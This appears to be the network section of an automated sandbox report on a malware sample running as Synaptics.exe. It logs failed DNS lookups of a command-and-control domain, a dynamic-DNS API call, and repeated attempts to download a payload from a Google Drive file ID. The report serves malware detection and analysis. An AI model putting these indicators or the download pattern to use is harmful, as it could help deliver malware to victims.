                                                                                            Jan 2, 2025 20:30:14.932478905 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.932631016 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.932673931 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.932730913 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.932857037 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:14.932866096 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:14.932995081 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:14.933007002 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.485888004 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.488202095 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.488723040 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.488739967 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.488960028 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.488974094 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.491637945 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.491719961 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.492417097 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.492468119 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.494550943 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.494563103 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.494858980 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.494945049 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.495414019 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.543338060 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.574760914 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.574815989 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.575330973 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.575336933 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.575829029 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:15.575839043 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.590496063 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.590574980 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.591255903 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.591310978 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.593060970 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.593070984 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.593316078 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.593354940 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.593672037 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.639333963 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.883900881 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.883975029 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.883977890 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.884078979 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.901578903 CET50165443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.901602983 CET44350165172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.902622938 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.902714014 CET44350170172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.902810097 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.903347969 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.903383970 CET44350170172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.980974913 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.981053114 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.981071949 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.981303930 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.981360912 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.981401920 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.981568098 CET44350166172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.981617928 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.981631041 CET50166443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.982152939 CET50171443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.982193947 CET44350171172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.982295036 CET50171443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.982893944 CET50171443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:15.982918978 CET44350171172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.046380997 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.046431065 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.046474934 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.046474934 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.046499968 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.046555042 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.046611071 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.047178030 CET50164443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.047192097 CET44350164216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.048126936 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.048161030 CET44350172216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.049236059 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.049526930 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.049541950 CET44350172216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.063832998 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.063891888 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.063919067 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.063936949 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.063950062 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.064024925 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.064095020 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.064146042 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.064202070 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.064766884 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.064795971 CET44350167216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.064804077 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.065068007 CET50167443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.065478086 CET50173443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.065509081 CET44350173216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.065572977 CET50173443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.065818071 CET50173443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.065835953 CET44350173216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.528628111 CET44350170172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.528706074 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:16.529423952 CET44350170172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.529489040 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:16.631356001 CET44350171172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.631449938 CET50171443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:16.632086992 CET44350171172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.632159948 CET50171443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:16.684520960 CET44350172216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.684658051 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:16.724069118 CET44350173216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:16.724184036 CET50173443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:28.614240885 CET50173443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:28.614280939 CET44350173216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.614573002 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:28.614607096 CET44350172216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.616995096 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:28.617013931 CET44350172216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.618006945 CET50173443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:28.618037939 CET44350173216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.621866941 CET50171443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:28.621900082 CET44350171172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.622220039 CET44350171172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.622281075 CET50171443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:28.962318897 CET44350173216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.962369919 CET44350173216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.962482929 CET50173443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:28.962487936 CET44350173216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:28.962527990 CET50173443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:29.109972000 CET44350172216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:29.110027075 CET44350172216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:29.110124111 CET44350172216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:30:29.110126972 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:29.110126972 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:29.110215902 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:35.341027975 CET4979780192.168.2.969.42.215.252
                                                                                            Jan 2, 2025 20:30:35.343728065 CET50171443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:35.343796968 CET50172443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:30:35.343863010 CET50170443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:30:35.343887091 CET50173443192.168.2.9216.58.206.65

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 2, 2025 20:29:36.022766113 CET6114453192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:29:36.029284000 CET53611441.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:29:36.838140011 CET5046753192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:29:36.845707893 CET53504671.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:29:36.854108095 CET6118853192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:29:36.861382961 CET53611881.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.149348021 CET6308253192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:29:37.156500101 CET53630821.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:29:40.939296007 CET6226653192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:29:40.946362972 CET53622661.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:29:46.620368958 CET6326053192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:29:46.627355099 CET53632601.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:29:51.139348030 CET6510953192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:29:51.146516085 CET53651091.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:29:56.964132071 CET5915853192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:29:57.112943888 CET53591581.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:30:03.933608055 CET6519553192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:30:03.941279888 CET53651951.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:30:10.825476885 CET5523553192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:30:10.832511902 CET53552351.1.1.1192.168.2.9
                                                                                            Jan 2, 2025 20:30:15.386799097 CET5139253192.168.2.91.1.1.1
                                                                                            Jan 2, 2025 20:30:15.394491911 CET53513921.1.1.1192.168.2.9

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 2, 2025 20:29:36.022766113 CET192.168.2.91.1.1.10x6bc8Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:36.838140011 CET192.168.2.91.1.1.10x8826Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:36.854108095 CET192.168.2.91.1.1.10xdf22Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:37.149348021 CET192.168.2.91.1.1.10x77c4Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:40.939296007 CET192.168.2.91.1.1.10xdea6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:46.620368958 CET192.168.2.91.1.1.10xe419Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:51.139348030 CET192.168.2.91.1.1.10xdd16Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:56.964132071 CET192.168.2.91.1.1.10x6ec4Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:30:03.933608055 CET192.168.2.91.1.1.10x98e5Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:30:10.825476885 CET192.168.2.91.1.1.10xe333Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:30:15.386799097 CET192.168.2.91.1.1.10x7e69Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Jan 2, 2025 20:29:20.876027107 CET1.1.1.1192.168.2.90xde0dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:20.876027107 CET1.1.1.1192.168.2.90xde0dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:36.029284000 CET1.1.1.1192.168.2.90x6bc8No error (0)docs.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:36.845707893 CET1.1.1.1192.168.2.90x8826Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:36.861382961 CET1.1.1.1192.168.2.90xdf22No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:37.156500101 CET1.1.1.1192.168.2.90x77c4No error (0)drive.usercontent.google.com216.58.206.65A (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:40.946362972 CET1.1.1.1192.168.2.90xdea6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:46.627355099 CET1.1.1.1192.168.2.90xe419Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:51.146516085 CET1.1.1.1192.168.2.90xdd16Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:29:57.112943888 CET1.1.1.1192.168.2.90x6ec4Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:30:03.941279888 CET1.1.1.1192.168.2.90x98e5Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:30:10.832511902 CET1.1.1.1192.168.2.90xe333Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:30:15.394491911 CET1.1.1.1192.168.2.90x7e69Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Jan 2, 2025 20:30:39.312104940 CET1.1.1.1192.168.2.90xf61aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Jan 2, 2025 20:30:39.312104940 CET1.1.1.1192.168.2.90xf61aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • docs.google.com
                                                                                            • drive.usercontent.google.com
                                                                                            • freedns.afraid.org

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.94979769.42.215.252807712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 2, 2025 20:29:36.867754936 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                            User-Agent: MyApp
                                                                                            Host: freedns.afraid.org
                                                                                            Cache-Control: no-cache
                                                                                            Jan 2, 2025 20:29:37.479986906 CET243INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 Jan 2025 19:29:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Vary: Accept-Encoding
                                                                                            X-Cache: MISS
                                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 1fERROR: Could not authenticate.0


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.949788172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:36 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:37 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:36 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4inL9mhOH5dhINdFXB-jfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.949789172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:36 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:37 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:37 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GFYliINaKJjUZHIpC7c6GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.949802172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:38 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:38 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-oJHZ-47rAc6y57KNA6yMSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.949803216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:38 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-02 19:29:38 UTC1602INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4LBabmw4sT-JCsvcoTPhNiO-1m02otZQQGE9xdHg-6PLurMKidHJjFnAIPmCwAqxajN8Dxo38
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:38 GMT
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-wWgwTKH6t-2j3wTNXqfVig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Set-Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm; expires=Fri, 04-Jul-2025 19:29:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
